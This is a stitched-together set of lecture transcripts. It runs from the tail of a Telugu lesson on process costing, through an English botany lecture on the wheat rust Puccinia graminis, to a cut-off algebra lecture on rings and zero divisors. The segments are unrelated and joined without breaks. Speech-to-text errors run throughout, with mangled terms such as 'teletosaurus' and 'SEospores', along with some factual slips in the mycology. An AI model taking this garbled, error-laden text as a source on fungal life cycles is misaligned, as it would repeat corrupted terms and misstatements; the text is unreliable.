అసాధారణ నష్టంగా భావించాలి. ఈ అసాధారణ నష్టం విలువ ఏ విధంగా లెక్క కట్టాలి ఒకసారి చూసినట్లయితే 17,500 యూనిట్లు వ్యయము మొత్తం 67,350 రూపాయలు. సో ఇందులోంచి సాధారణ నష్టం విలువని 700 యూనిట్ల విలువ 1,400 రూపాయలు తీసినట్లయితే 16,800 యూనిట్ల ఖరీదు ఇప్పుడు 65,950 రూపాయలు అయింది. అంటే ఒక్కొక్క యూనిట్ తాలూకా వ్యయము 3 రూపాయల 92 పైసలు అయింది. సో ఇప్పుడు 100 యూనిట్లు అయినటువంటి అసాధారణ నష్టం విలువ ఎంత అవుతుంది? 100 యూనిట్లు ఇంటూ 3 రూపాయల 92 పైసలు. సో ఈ విధంగా మనం అసాధారణ నష్టం లెక్కించి ప్రాసెస్ బి ఖాతాకి మళ్లించినట్లయితే మొత్తం ప్రాసెస్ బిలో మనకి ఎంత ఉత్పత్తి వ్యయమైంది అన్నది మీకు క్లియర్గా తెలుస్తుంది. ఇది ప్రాసెస్ కాస్టింగ్లో ఉండేటటువంటి ప్రక్రియ. ఈరోజు మనం ప్రాసెస్ కాస్టింగ్ అంటే ఏంటి తెలుసుకున్నాం, ప్రాథమిక అంశాలు తెలుసుకున్నాం. ప్రాసెస్ కాస్టింగ్లో ఉండేటటువంటి లక్షణాలు ఏంటి, ప్రయోజనాలు ఏంటి, లోపాలు ఏంటి తెలుసుకున్నాం. ప్రాసెస్లో వచ్చేటటువంటి నష్టాలు ఎన్ని రకాలుగా ఉంటాయి, సాధారణ నష్టం, అసాధారణ నష్టం అని తెలుసుకున్నాం. అదేవిధంగా ప్రాసెస్ కాస్టింగ్ లెక్కలు ఏ విధంగా చేయాలి, ప్రాథమిక అంశాలతో కూడిన లెక్క ఒకటి ఉదాహరణ మనం చూసాం. అలాగే సాధారణ నష్టంతో అసాధారణ నష్టంతో లెక్క ఇచ్చినట్లయితే ఏ విధంగా చేయాలి అనేది మనం చూసాం. తదుపరి సెషన్లో మరిన్ని ఉదాహరణలతో ఉపవస్తువుల గురించి, ఉమ్మడి వస్తువుల గురించి ఏ విధంగా లెక్కించాలనేది మనం తెలుసుకుంటాం. థ్యాంక్ యూ మై డియర్ స్టూడెంట్స్. Welcome, dear students, to first year botany class. Most of us know that the horticulture and agriculture crops are attacked by pests and diseases. Today in this session, let's learn and discuss briefly about the structure and reproduction of macrocyclic fungi Puccinia graminis triticale. See, Puccinia is a macrocyclic fungi. We commonly call it as a rust-causing fungi. Systematically positioned under division Eumycota, subdivision Basidia mycotina, class Teleomycetes, order Uridinales and the family Pucciniaceae. This genus
Puccinia includes about 700 species. Of these, 147 have been reported from India. This genus spreads inter and intracellularly. It is an obligate parasite. We call it obligate parasite because it cannot survive without the host. It is obligate parasite on many cereals, millets and other crops of economic importance. These rusts also have pleomorphic life cycle. Pleomorphism means Telugulo manam bahurupakatvam antam chudandi adi. That means it has more than one independent form or spore stage produced at 5 reproductive stages in the life cycle. They are pycnospores, aciospores, uridinospores or uridospores, teleospores or teletospores and basidiospores. Based on these life cycles, all the rusts are divided into 3 categories. The first category is macrocyclic, and the second one is demicyclic, and the third one is microcyclic. We'll see one by one. Macrocyclic rust. That means those rust fungi which produce all the 5 spores states, they are called macrocyclic rust. That means there are 2 kinds in macrocyclic also. One is autoecious rust. That means all the 5 stages are produced in only one host. That means in one host only all the 5 stages will be completed. And whereas in another type, they are heteroecious rust. These 5 stages of spores are produced in 2 alternate hosts. These 2 alternate hosts also, one becomes a primary host and other one becomes a secondary host. Primary host, for example, in case of species that we are studying today, that Puccinia graminis triticai, the primary host is wheat, that in which host bears uridial and teleal stages. And the secondary host, or otherwise we call it as alternate host also, this host will bear spermatial and acial stages. And usually without these 2 hosts, this heteroecious rust cannot complete its life cycles. Other categories are demicyclic rust. Demicyclic rust are, we can say, only 3 types of spores are produced in this. Usually uridinal stage will be lacking and sometimes spermagonia also will be absent. So this example we can take as orange rust of rubus plant, which is caused by Gyneconia peckiana. And the last category is microcyclic rust. These microcyclic rust are very short life cycles. They have very short life cycle. It produces only 2 types of spores. One is teletospore, another one is basidiospores. Example for this type of microcyclic rusts are Puccinia malvacearum and Puccinia heterospora. So in our session, since we are interested in Puccinia graminis triticide, let's briefly study more about it. And usually this attacks wheat crop, which is economically important camp. And this wheat crop is also attacked by other Puccinia species which cause other rust. These are the 3 different types of rust caused by Puccinia species. The first one is black or stem rust, which is caused by Puccinia graminis triticide, and the second one is brown or orange rust caused by Puccinia recondita, and the third one is yellow or stripe rust, Puccinia striformis. In this, the major difference is in the first case, in the stem rust, black stem rust, the teletospores, since they are black in color, they formed above the leaf surface, so we call it as black rust. Whereas the second one, brown or orange rust, their uridospores are orange in color and teletospores are formed below the leaf surface. So we call it as orange rust. And the third rust is yellow rust. There the uridospores are yellow in color and the leaf, they are above on the dorsal side it will be formed, and the teletospores are formed, though they are black in color, they are formed on the ventral surface. It gives the yellowish appearance and we call it as yellow rust. And the season variation also is there. Black rust usually it will be in somewhere in March and April, and brown orange rust will be mostly probably occur in January, whereas in yellow rust mainly occur in December and January. So let's study more about this Puccinia graminis triticai which cause stem or black rust.
So in this session, we shall see the habit and habitat of Puccinia graminis, occurrence, the vegetative structure, and symptoms on the pathogenic symptoms and the reproductive stage of Puccinia. We'll see one by one. Habitat. Where does it live? Puccinia graminis, as I said already, it is an obligate parasite. What is obligate parasite? Obligate parasite is the one which cannot survive without the specific host. So it cannot survive. It has more than one type of spores produced in its life cycle. And the macrocyclic. Macrocycle, as we discussed earlier, it has 5 spore stages, that pycnospore, acidiospores, and uridinospores, teletospores, and basidiospores. And it is also heterothallic. Heterothallic means it produces 2 types of mycelium. One is dikaryotic mycelium, which is present on the primary host, and second one is monokaryotic mycelium, which is present on the secondary host. And it is also heteroecious rust, alternate host, that is Burberry. So it affects wide range of hosts, including wheat, barley, oats, and rye, and many grass hosts include the agrotis and dactylitis, etc. It will cause the rust disease. To say broadly, the Puccinia graminis triticum involves in its life cycle 2 distinct alternate hosts. One is a primary host, that is a wheat, which is very economically important for us. That is, the scientific name of this plant is Triticum vulgare, belongs to the family Poaceae. In this host, it will have uridial and teleal stages. And the next one is secondary host is a Burberry. This is Barberry. The scientific name is Berberis vulgaris, belongs to the family Berberidaceae. In this plant, it will have 2 stages. One is pycnospore stage, another one acidiospore stage. So it needs 2 hosts. One is primary host and one is secondary or alternate host. That's why we call it as heteroecious rust. Usually this black rust appears after March in North India, whereas in South India it may appear as early as in the 4th week of November, and this causes a great loss to wheat crops. But there is always a pest and plant relationship. Though it is attacked by the pathogen plant, it will not give much damage, only it reduces the yield by reducing the size of the granules. Now let's see this vegetative structure. As I discussed earlier, I'll start with the primary host. The mycelium in the primary host is dikaryotic. Dikaryotic means each cell in the mycelium will be having 2 nucleus and the primary host. Whereas on the secondary host, Burberry, it is monokaryotic. That means each cell in the cell will have only one type of nucleus. That will be an alternate host. This monokaryotic mycelium, we can also call it as haplomycelium or primary hyphae, whereas the dikaryotic mycelium is also called as secondary hyphae. So this mycelium is in particular places and it looks like as patches that we can visually see when the disease grows and the infected leaves. And it is either intercellular or intracellular grown obligate parasite. In the former cases, if it is growing intercellular, it has to draw the nourishment through hostorium. Maybe it is a branched or a knob-like structure which penetrates into the cell inside and draws the nourishment. Parenthosome complex, it is completely absent. It has only simple centrospore. And the cell wall is made up of fungal cellulose, and the granular Puccinia graminis triticum is glycogen bodies or oil globules. Now, we have studied the vegetative structure. Now we'll see the symptoms. Symptoms we can see in the primary host as well as the secondary host. In the primary host, as I have already discussed, that it will be having uridinyl stage and teleal stage. Uridinyl stage means, you can see this in this picture. Uridinyl stage, you can see the dry, dark brown elongated pustules over the stem, on leaf bases and leaf sheaths. This is usually iridosauri. It will be usually seen in the growing period. When it comes to an end, when the growing period comes to an end, when the season is unfavorable, then the iridospores will not be formed
and teletospores will be formed. Teletospores are dark brown or black in color. You can see that embossed pustules on the stem. Whereas in barberry, you can see at that time, on dorsal side you can see yellow pustules representing spermagonia, which contains spermatia and receptive hyphae. On the ventral side we can see acidia, aciospores with aciospores. So overall I could say this Puccinia graminis in its life cycle, in the first phase on the primary host and the second phase on the secondary host, will have 5 stages, reproductive stages in its life cycle. The first, if you start with the 0 stage, and stage 0 and stage 1 will be in barberry secondary host. In the stage 1, stage 0, we can observe these basidiospores germinate, forming extensive hyphae, and this becomes forms spermagonia and produces spermatia and receptive hyphae, and on spermatization it will enter into stage 1 where it produces acidiospores. Then after this in the stage 2, which will start on the wheat plant, these acidiospores germinate on wheat. Later on, they produce dikaryotic mycelium, and when the seasonal changes triggers the formation of Telia or Teletosaurus bearing teletospores in the place of iridospores. In the stage 2, iridospores are formed. These iridinospores are called as repeating spores because up to 4 to 5 generations, this will be causing infection and reinfection, spreading the disease all over the field. It will be spreading continuously. But when the growing season ends, that triggers the formation of teletospori. In the teletosori, the teletospores are formed. That becomes the stage 3. At the end of the stage 3, teletosaurs are formed. Either these are not capable of immediate germination, so it will undergo a rest. So these are called resting spores, right? And these resting spores either stay on the plant, wheat, or it will get into soil to form basidiospores. So finally, to conclude, in this session, I could say there are 5 spores in its reproductive stage. If you take the most economic plant, wheat, as a primary host, and it will start with the stage 2 iridospores, either acidiospores or iridospores germinate on this wheat plant, and it produces the dark brown or red color pustules on it, and later on at the end of growing period it produces teleospores. These teleospores later on, either on the debris of wheat plant or in the soil, undergo nuclear fission and undergoes meiosis to produce basidiospores. These basidiospores, as a haploid one, they go and attack barberry. They cannot attack wheat plant again. They will not survive if the barberry is absent. So it will attack barberry plant, and it will produce spermatia and receptive hyphae. By spermatization and dicaryotization, diploidization, it gives aciospores. Again, these aciospores continue its life cycle if wheat plant is present. So only we call this Puccinia as heteroecious rust because it has 2 alternate hosts, and macrocyclic rust because it has 5 stages of spores in its reproductive, and it's obligate parasite because it should have these alternate hosts, otherwise it will not be surviving. So to conclude, it is Puccinia graminis is a obligate parasite, macrocyclic, heterothallic, heteroecious, polymorphic rust.
Welcome back to the second session at life cycle of Puccinia and wheat. Students, in the last session, we have learnt in broad perspective the overall life cycle of Puccinia graminis tritica and the wheat. Now we study in detail about the life cycle on wheat. See, as we have discussed in the previous session, that Puccinia graminis is a long cycle rust and it produces 5 distinctive stages in regular sequence. These are stage 0 and stage 1, spermagonia and spermatia, and which forms spermagonia bearing spermatia and receptive hyphae, acea bearing aciospores. These 2 stages will be on alternate host, Berberi, and the stage 3, iridia bearing iridospores or iridospores, Telia bearing teletospores, all will be on primary. Out of these 5 stages, iridospore, teletospore are produced on the primary host wheat. So let's study in detail how this iridospore stage and followed by teletospore stage occurs on the wheat plant. See, this wheat plant, Puccinia reproduction asexually by sporulation it takes place. So you can observe asexual reproduction in wheat plant. So in this session we will be briefly studying on germination of aciospores, iridinospores, iridinia and iridinospores, germination of iridinospores, telia, teleospores, structure of teleospores, basidia and basidiospores. Now let's see one by one. We'll continue, we'll start with the stage 2, iridinia and iridinospores. See, I will be frequently changing the words iridinospores and it can be called as iridospores also. Don't get confused with that. So let's start how the infections start on wheat and it spreads. See, initially you can see a dikaryotic spore here. This may be aciospore which has come from Barbary, or it is a iridinospore which has come from the neighboring wheat plant. So it can cause infection. So either aciospore or iridinospore from the infected neighboring wheat plants. They will germinate a thread-like structure called primary germ tube. It will grow on the epidermis and enter the plant leaf through these stomata by forming aprosorium and substomatal vesicle. You could see this dikaryotic nucleus will enter through the aprosorium and substomatal vesicle. Later this will form a secondary germ tube and finally it gives rise to this dikaryote mycelium which will spread intercellularly. Sometimes you can see this direct penetration also. So through penetration peg also it can directly enter into through epidermis and it spreads its hyphae intercellularly, and you can see here knob like hastoria which helps in drawing the nourishment. So within the 7 to 12 days of infection, hyphae get accumulated below the epidermis. So you can see in this diagram, see within 7 to 21 days, usually 1 week time also it will spread. You can see some vertically grown hyphae here. These are called sporophores. These are arranged compactly like a palisade layer, and the upper cell of this sporophore divide transferally gives rise to a basal cell, lower basal cell and upper spore initial. This basal cell do not divide again, whereas that upper cell again it will divide to produce lower stalk cell and a upper uridinospore mother cell. Initial we can also call. So later on this stalk cell will enlarge, it will grow and produce a long stalk like just forms a ovular uridinospore. And when this grows completely, you can observe in the field a reddish brown patches on the stems, leaves. It appears as though it is burnt by the fire. The name uridinospore has come from the Greek. That means urir means to burn. So when the stage 2 occur on the plant or the field, you can see a red color. See, so only we call it as the red rust of wheat. And when it usual spore, this has a long stack
long stalk. This uridospore is a unicellular, dikaryotic, oval-shaped, brown-colored cell. Each spore will have a long stalk and a thick achinucleate, two-layered wall. See, outer layer you can see in this picture, it is a thick, spiny exospore, whereas the inner layer is very delicate, hyaline. That means it doesn't have any color, and it's known as endospore. So this spore has dense cytoplasm and oil globules, stores food in oil patches. In these electronic microscope pictures of vertical section of uridosauri or uridinea, you can see here the mycelia in this picture, mycelia accumulation below the epidermis, and from these palisade like sporophores are reddish brown in color due to the presence of brown pigment. Later, after completion of formation of iridospores, what happens that huge number of iridospores, they press against the overlaying epidermis, and these iridospores get exposed, and it will be disseminated by the wind, and it spreads the disease inside and cause the disease. Again it produces iridospores, and it will again disseminated by the wind, and it will start spread again, causing infection, and again. So we call these iridospores as repeating spores. So only we call them as repeating spores. See, you can see this. You can observe this type of brown or reddish brown pustules over the field on stem, on leaf field. When disease spreads, you can see on the leaf also. So we call that, as I said, it gives burnt appearance, which comes from the grangium, or in which iridospores are formed. Now we'll enter into the stage 3 of Puccinia life cycle on the wheat. So in the stage 3, tilia and tilitospores are formed. So towards the end of the growing period, wheat crop, the environmental conditions become unfavorable. It becomes very hot and dry for the growth of the iridospores, and at this moment they start producing tilitospores. Initially, tilitospores are produced in iridosauri itself on the dorsal surface itself, but later on these tilia, the tilito ends when the iridospores production is completely stopped because of hot and dry weather. It will start producing tilitospores. Gradually the color shifts from dark brown to black. Since these iridospores are brown in color, they give brown appearance, and these tilitospores are black in color. The field you can see black patches and elongated patches, those we call it as tilia. So now these can be called as black or stem rust. Now you can see in this diagram clearly. Previously I told that we have seen that iridosauri is brown in color, whereas this teratopustule or teratosauri, or we can call teratosaurus or tilia, you can use any of the word. These are you can see here is elongated, embossed, black color pustules. We can see on stem, we can see on leaf sheaths and leaf surfaces. If you get into detail these electron microscope pictures, you can see the tilitospores. As we have previously studied, the iridospore structure is entirely different from tilitospore structure. We'll get into it now. These tilitospores are black or dark brown in color. They are two-celled, arranged one above the other, whereas in iridospore is a single cell. But in tilitospores, there will be two cells arranged one above the other. It has a thick, black, smooth wall, and each cell has two nuclei. One belongs to plus strain and another belongs to minus strain. And each cell will have a germ pore. You can see in this. This is the structure of, in this diagram, you can see the structure of tilitospore. There are two cells arranged one above the other, and each cell will be having two cells. One becomes two nucleus. Sorry, one belongs to plus strain and another belongs to minus strain. When this matures, these will combine
join or fuse to form a diploid nucleus when mature. And these cells will have maybe a conical tip or rounded tip like this also we can observe, and it has a germ pore on the tip. Then later on, these teliospores, after formation of teliospores in the telia, they exert pressure on the overlaying epidermis, which finally ruptures and spores are exposed. These spores are formed towards the end of growing season, as indicated by the name itself. The teliospores comes from the Greek word telos. Telos means end. So since it is formed at the end, we call it as teliospores. Once as I told in the figure, once the teliospore matures, the two nucleus of each cell nation. Instead, they undergo a long period of rest, either in the soil or in the host tissues till next spring. So hence these are called as resting spores. Growing season, when the growth season ends, when the situation or climate becomes unfavorable for the formation of iridineospores, these fungi forms the teletospores, which are dark black in color. So the symptoms and external symptoms what we observe will be shift from dark brown to black. So that iridineospores, we call it as repeating spores, since it spreads the infection, whereas these teletospores are not capable of immediate germination, so we call them as resting spores. Then these teletospores enter into, after germination, will enter into basidial stage. This stage, either it may occur on wheat plant itself, or after a dissemination by the wind, it may fall into the ground in the soil when the favorable conditions comes. That means when it has, you can say, at these conditions, these teletospore germinate to produce basidiospores. In this picture, you can see this is a structure of a teletospores when it is young. You can see the upper cell and a lower cell of a teletospore, both having dikaryotic nucleus, two nucleus. One belongs to plus strain, another belongs to minus strain. When it matures, maybe sometimes before dispersal or sometime after dispersal in the soil also, they fuse to form a diploid nucleus. These diploid nucleus teletospores, on return of favorable conditions, this will germinate and give rise to a basidial stage. You can see this will germinate. The upper cells, as we discussed earlier, it will have a germ pore at the top, and the lower cell has a germ pore below the septum. It will produce a tube-like structure called as promycelium, and for the upper cell this is known as epibasidium. For the lower cell it is known as hypobasidium. In these two dikaryotic diploid nucleus at this stage undergoes meiosis and produces 4 haploid nucleus. And nucleus, and there will be a septate formation we can observe, and it will result in 4 haploid cells. 2 cells belongs to plus strain and 2 cells belong to minus strain. You can see these 4 haploid nucleus here. 2 cells belong to plus strain and 2 cells belong to minus strains. So at this stage it will have 4 haploid uninucleated. Each cell will produce a outside hyaline tube-like structure. At the end of that structure, it will produce a basidiospore. So then gradually the nucleus from the cell will travel through sterigmata and enter into the basidiospore. So finally, when you see, you can observe in this picture, so it will be forming 4 haploid cells will be forming sterigmata, and finally producing this oval shaped basidiomycetes. 2 belong to plus strain and 2 belongs to minus strain. Then through water droplet mechanism mainly, these spores are forcibly discharged by a heterogeneous rust and obligate parasite. These basidiospores can germinate only in the presence of on the barberry plant. If there is no barberry plant,
it will not survive. It will wait till the barberry plant comes, maybe up to 3 months or 6 months it will survive. Then later on, if it doesn't find the barberry plant, it cannot reinfect wheat, it will die. So in the life cycle of Puccinia on wheat, we could see 3 stages. The first one, Uridinia containing iridospores, which are unicellular and dikaryotic, and it has 2 cells, so known as repeating spores, because this will be causing again and again infection over the wheat plant. It spreads the disease in the growing season. In the stage 3, we have seen the teletosporus formation, in which the teletospores are formed. Each teletospores or teleospore will have 2 cells laid one above the other. They are conical in shape, and it will have 2 germ pole, and it is dikaryotic in nature, and one nucleus belongs to plus strain and another one belongs to minus strain. And when the growth season ends, this wheat plant dies, and maybe this with the pressure teletospores come out and disseminated by the wind or stay itself on the wheat plant till the favorable conditions. When the favorable condition returns, these 2 nucleus in each cell division produce 4 haploid nucleus. On germination, it gives 4 basidiospores. Now these basidiospores can only infect a barberry plant, not a wheat plant. Now this Puccinia graminis, since it has both the uridinal stage and teleal stage only on wheat plant, welcome back, students. In the previous 2 sessions, we have studied the complete life cycle of Puccinia and the life cycle of Puccinia and wheat plant. In this session, we are going to study briefly about this, and this act as a secondary host or a alternate host. The basidiospores, which are formed by wheat plant, Puccinia on the wheat plant, during the favorable conditions, teletospores will give rise to basidiospores. On favorable conditions, it will germinate on wheat. This we have discussed in the previous session. On barberry, we can see the sexual reproduction of Puccinia, whereas in wheat we have seen the asexual reproduction, and in barberry we can see the sexual reproduction. They reproduce sexually by a plasmogamy. This will contain 2 stages, stage 0 and stage 1. Stage 0 means it is a pycnospore stage. On upper epidermis, these positive and negative basidiospores germinate to give rise to spermagonia, and that will have spermatia and receptive hyphae. That is the stage 0. And the next spores that is developed is the acidiospore stage Asia. These pycnospores are formed on the upper surface or the dorsal surface, whereas the aciospores are formed on the ventral surface. These can be formed at the same time, whereas we have seen in the wheat, these uridinospores are formed in the growth season. After completion of growth season, when the situations or the climate is not favorable, they will form teletospores. But whereas in barberry, at the same time, on the dorsal surface of the leaf, we can observe pycnospores formation, and at the lower surface of the leaf, we can see these acidiospores formation.
So now let's see the stage 0 spermagonia formation and spermatia. See, the spermagonia, we also call it as pycnia. These basidiospores germinate on the upper surface by forming, it will form a germ tube which enters the host through epidermis. As we earlier discussed that uridinospores or achiospores enters through forming a germ tube, primary germ tube that enters through stomata and apprecium and substomatal vesicle, and it will form secondary hyphae. Everything will be repeated here. What it will happen, this germ tube penetrates. After penetration, it will intracellularly, it forms a, you can see in this, after penetration, this will form below the epidermis intracellular monokaryotic septate mycelium known as prosmycelium. See, in the wheat plant we have studied that will produce a dikaryotic mycelium. Dikaryotic means each cell will be having 2 nucleus and haploid in nature. Once the haploid basidiospores germinate on barberry plant, naturally it gives rise to a haplomycelium, we call it as primary hyphae. This will spread intercellularly, and it draws nourishment through a branched or knob-shaped haustorium, and it spreads. This mycelium may be carrying either plus or minus nuclei depending upon the basidiospore from which it has raised. So within 3 to 4 days of infection, this mycelium forms a flask-shaped structure like this. You can see here a flask-shaped structure. This is known as spermagonia. Within 3 to 4 days of infection, see, you can see here, these are the structure of a basidium, germin and basidiospores formation. See, if you think this plus basidiospore strain germinates here, it forms a spermagonia belongs to plus strain. And here minus basidiospore germinates this side. On the same leaf, it produces minus strain type of promycelium. This will spread below the epidermis within 3 to 4 days, form a flask-shaped structure known as spermagonia. This is opened through a narrow pore known as ostiole. This pore is known as ostiole. Within the cavity, you can see many elongated cell structures which are tightly compactly aligned. Here you can see these. These are known as spermatophores. You can see here. At the tip of spermatophore, it gradually produces a series of uninucleated cells known as spermatium. So these are present inside the cavity. In this cell, you can see, in the cavity, you can see a series of unicellular spermatia. And at this opening, you can see ostiole, there are some brown color hair-like structures known as periphyses, and some grow above the periphyses. These structures, they are known as receptive hyphae, they are branched. These periphyses is not branched, they are just brown color or orange color hair which covers and protects the spermatia, and this receptive hyphae is a branched structure and which is considered as female reproductive organ of fungi, and this spermatia is considered as the male reproductive organ. As we discussed already, this barberry plant Puccinia shows sexual reproduction, and these spermagonia represent the sexual organs of fungus. Spermatia as male structure and receptive hyphae as female structure. Those spermatia in one spermagonia, only one type of strains will be present. Either it will be producing only positive spermatia and positive receptive hyphae. So by water drop technology, this ostiole will produce a honey nectar towards the end, which is attracted by the insect. It will come for it, insect, and it will take the spermatia with its wings, and it will spread over the receptive hyphae of another spermagonia present on the same leaf. So sometimes through wind also it can be disseminated, and sometimes through insects it will be transferred from one
spermagonia to another spermagonia. So from suppose if you think one spermagonia, as we previously discussed, belong to positive basidiospores, that positive spermatia will go to the negative receptive hyphae of another spermagonia present on the same leaf. So this receptive hyphae will receive the spermatia of opposite strain. Here you can see, suppose if you think this is a positive strain, it will receive a negative spermatia. Once this process is known as spermatization. So transfer of spermatization. After receival of spermatia by, that means male nucleus by female reproductive organ receptive hyphae, what happens? It will penetrate into the first cell of receptive hyphae. After entering nucleus, this male nucleus will enter into all cells through septophore. In the vegetative structure we have studied that it has a simple central septal pore. So through that pore, this repeatedly developed male nucleus will be transferred to all cells of the mycelia. All the cells, so it will reach all the cells of the mycelia and completely it will dikaryoticization will takes place. So each and every cell will be having a plus and minus cell nucleus. So male minus nucleus has come and it has divided and again divided and entered into all the cells of mycelium. So completely after spermatization, though in the spermatization process only a receptive hyphae received a single spermatia belong to opposite strain, it will make mycelium dikaryotic. Now we will see the next stage, achia formation and achiospores production. In this stage you can see this when the on the upper epidermis, when this spermagonia is formed and spermatia and receptive spores are being formed, at the lower surface of the leaf forms a globose mass known as acial primordium or acial initial. Initially it is monokaryotic in nature. So at the upper side you can see the formation of pycnospores, that means spermatia and receptive hyphae. At the lower stage we can have this achiospore, acial primordium or initial. It is monokaryotic in nature. Once the dikaryoticization takes place, occurs, this lower acial primordium becomes achiospore 4. So initially the mycelial cells, the mycelium become dikaryotic, and at the lower epidermis, the acial primordium also becomes dikaryotized and it acts as dicaryotization. Initially it will have only basal cell, single basal cell. After dicaryotization, it will repeatedly produce many cells. It will produce one large cell, then one small cell, continued by one large scale. One division it produces 2 cells, one is a large cell, another one is a small cell. Like this it will be continuously producing many cells. You can see this in this diagram. This is the ventral view of a Burberry leaf. You can see the yellowish patches which is embossed outside, and this is the vertical section of a leaf where you can see the achia. So this here you again to produce achiospore. The larger cell we call it as achiospore, and the small cell we call it as intercalary cell or disjuncture cell. So this entire thing is a cup-shaped structure, is covered by a layer known as peridium. This peridium also has developed from the peripheral basal cells. From achiosporophore basal cell also from peripheral side will gives to peridium. So this cup-shaped structure is known as achia, or in singular it is known as achium. Now if you see the structure of achiospore individually, as I said, this basal cell divides once to give rise to a bigger cell and a smaller cell, one bigger cell and a smaller cell. Bigger cell we call it as achiospore, and a smaller cell we call it as intercalary achiospores. Under suitable conditions,
this will be dispersed. Each SU-spore, we have seen in the previous slide, they are polyhedral binucleated structure. It has a outer thick smooth exine and a thin inner intine. When matures, the SU-spores fall from the cup and carried away by the air currents with the life cycle. So here one thing we had to observe is, in this barberry, it produces pycnospores, that is spermatia, that is received by receptive hyphae. Then after entering, dikaryoization takes place. Then dikaryoization, it will be proceeded till the lower epidermis hyphae, and the end cell epidermis SEosporophore will act as a acidium initial to produce acidiospores. These acidiospores will be blown away by the wind current. So once it comes out of the plant, it cannot reinfect the barberry again. If the wheat plant is present only, it can survive. Otherwise, it will wait for the primary host. If it doesn't find any primary host, it cannot survive. That's why we call this Puccinia as a heterogeneous rust and obligate parasite. Say, in a broad sense, if you see the entire life cycle of Puccinia, including a primary host and wheat and a secondary host barberry, we can see here, we'll start, since the wheat is of economic importance, I'll start with stage 2. This wheat plant is infected by uridineospores or SEospores. SEospores developed from barberry plant or uridineospores developed from wheat plant itself will cause infection and produce uridinosori to produce again uridineospores. These uridineospores are, since they are brown in color, it gives a brownish appearance, so we call it as a red rust of stem when plant is in this stage. So this uridinospore condition continues till the growth period. Once the growth period comes to an end, the environmental conditions become unfavorable for the uridinospore formation. What does the fungal Puccinia hyphae do? It will start producing teletospores. Initially, these teletospores are produced in uridinosori, but later these will be produced in a specialized sori called telia or teletosaurus. We can call it as otherwise also. In this teletosaurus, so these teletosaurus, since they are black in color, so we can observe the change in the field in the field view itself. So it will change from brown color to black color at the end of the growth stage when the uridiноspores are displaced by the formation of teletospores. The uridiноspores are cells. It has 2 cells, one above the above. They are spindle shaped and it has only 2 germ pores, one each in each cell. These teletospores, on return to a favorable condition, either on the wheat plant or in the soil, they will start after meiosis, they will start producing basidiophore. You can see here. See here, these will undergo karyogamy, though this undergoes meiosis. This is the life cycle that we can see in primary host wheat, and later on these basidiospores, they germinate on the barberry alternate host and gives rise to the pycnospores formation. That means you can see the spermatia formation here, where spermagonia formation, where it produces spermatia and the receptive hyphae, and followed by the dikaryoization from the upper surface to, so it will enter into the lower surface and forms the acidiospores. These acidiospores again can infect only the wheat plant. So if it doesn't find a wheat plant, it can polymorphic, macrocyclic and heterothalic heteroseous rust.
Welcome to Mana TV classes. My name is Dr. J. Girish Kumar, Assistant Professor of Mathematics, SVA Government College, Srikalahasti. In this class, we will learn about an integral domain. This integral domain is introduce an integral domain. First of all, we recollect the definitions of some basic ideas on rings. Okay. What is meant by ring? Suppose R is a non-empty set and plus comma dot be two binary operations. Suppose if these two binary operations satisfy comma dot is said to be ring, then what are the properties? First one, R is a commutative group with respect to addition. R is a commutative group with respect to addition. And second one is R is a semi group with respect to multiplication. And the third one is distributive laws hold in R. So, here there are two distributive laws. One is left distributive law, that is A into B plus C is equal to AB plus AC, and the right distributive law is B plus C into A is equal to BA plus CA. Okay. So, these are the some examples of rings. That means, the ring of integer, that is Z is the set of integers, Q is set of rational numbers, R is set of real numbers, and C is set of complex numbers. These all are rings with respect to usual addition and usual multiplication, and M2 is the set of all matrices of the 2 by 2 type. So, here the matrix addition and matrix multiplication is the binary operations, therefore, M2 forms a ring. Next, coming to ring with unity. Suppose in case this ring, that is R, has the multiplicative identity. So, what is the multiplicative identity? 1. Suppose if 1 belongs to R, then the ring R comma plus comma dot is said to be ring with unity. That is, a ring is said, R comma plus comma dot is said to be a ring with unity if there exists a multiplicative identity, that is 1 belongs to R such that A in 1 into A is equal to A into 1, that is equal to A for all A belongs to R. Next, coming to the commutative ring. Suppose if capital R satisfies the commutative property with respect to multiplication, that means A B is equal to B A for all A comma B belongs to R, that is 0 divisors. Suppose if you consider any two non-zero elements, then for example, A is not equal to 0 and B is also not equal to 0, but their product, that is A B, is equal to 0. Suppose if this is possible, that is A not equal to 0, B not equal to 0, but A B is equal to 0, then the elements A and B are said to be 0 divisors. So, that is a non-zero element A of a ring R is said to be 0 divisor or divisor of 0 if there exists an element B not equal to 0. That means, here A is a non-zero element and B is also non-zero element, but the product A B is equal to 0 or B A is equal to 0. Then this is possible, therefore, A and B are said to be 0 divisors. Suppose in case these type of elements are there in the ring, that means that concept is said to be ring with 0 divisors. Suppose these type of elements are there in the ring, then this ring is said to be ring with 0 divisors. That means, a ring is said to be a ring with 0 divisors if there exist two non-zero elements A and B such that either A B is equal to 0 or B A is equal to 0. So, next one, ring without 0 divisor. Suppose these type of elements are there in the ring, then that ring is said to be ring without with 0 divisor. Suppose these type of elements are not there in the ring, then that ring is said to be ring without 0 divisor. So, this without 0 divisor property can also be stated as
suppose if A not equal to 0 and B not equal to 0, that implies AB is also not equal to 0. And similar one, that is this concept also can also be restated as, suppose if AB is equal to 0, that implies either A is equal to 0 or B is equal to 0. So, dear students, the ring without zero divisor concept can be defined in the two ways. One way is A not equal to 0, B not equal to 0, that implies AB is also not equal to 0. And the another way, if AB is equal to 0, that implies either A is equal to 0 or B is equal to 0. Okay. So, but while we proving the theorems, we frequently use this concept, this type of definition, that is, suppose if you prove any concept ring without zero divisors, then we will take the help of this concept, that is AB is equal to 0, that implies either A equal to 0 or B is equal to 0. Okay. So, a ring is said to be ring without zero divisors or has no zero divisors if the product of no two non-zero elements. So, here the no two non-zero elements of R is 0, that is, if A not equal to 0 and B not equal to 0, that implies AB is also not equal to 0, or if A is equal to 0, that implies either A is equal to 0 or B is equal to 0. So, example for the ring with zero divisors. Suppose if you take Z12, that is the set of residues modulo 12. So, the elements are 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 and 11. These are the elements in Z12. So, here the binary operations are addition modulo 12 and multiplication modulo 12. So, in this set we have some zero divisors. So, what are they? Suppose if 2 is a not equal to non-zero element and 6 is also a non-zero element, but the combination with respect to the second binary operation, that means 2 multiplication modulo 12 6 is equal to. So, what is the resultant? That is 2 into 6 is 12, 12 is divided by 12 is, you get the remainder 0. That means the product of two non-zero element is 0. So, the product of two non-zero elements is 0, then the two non-zero elements are said to be zero divisors. So, similarly 3 multiplication modulo 12 4 is also 0, 4 multiplication modulo 12 6 is equal to 0, and 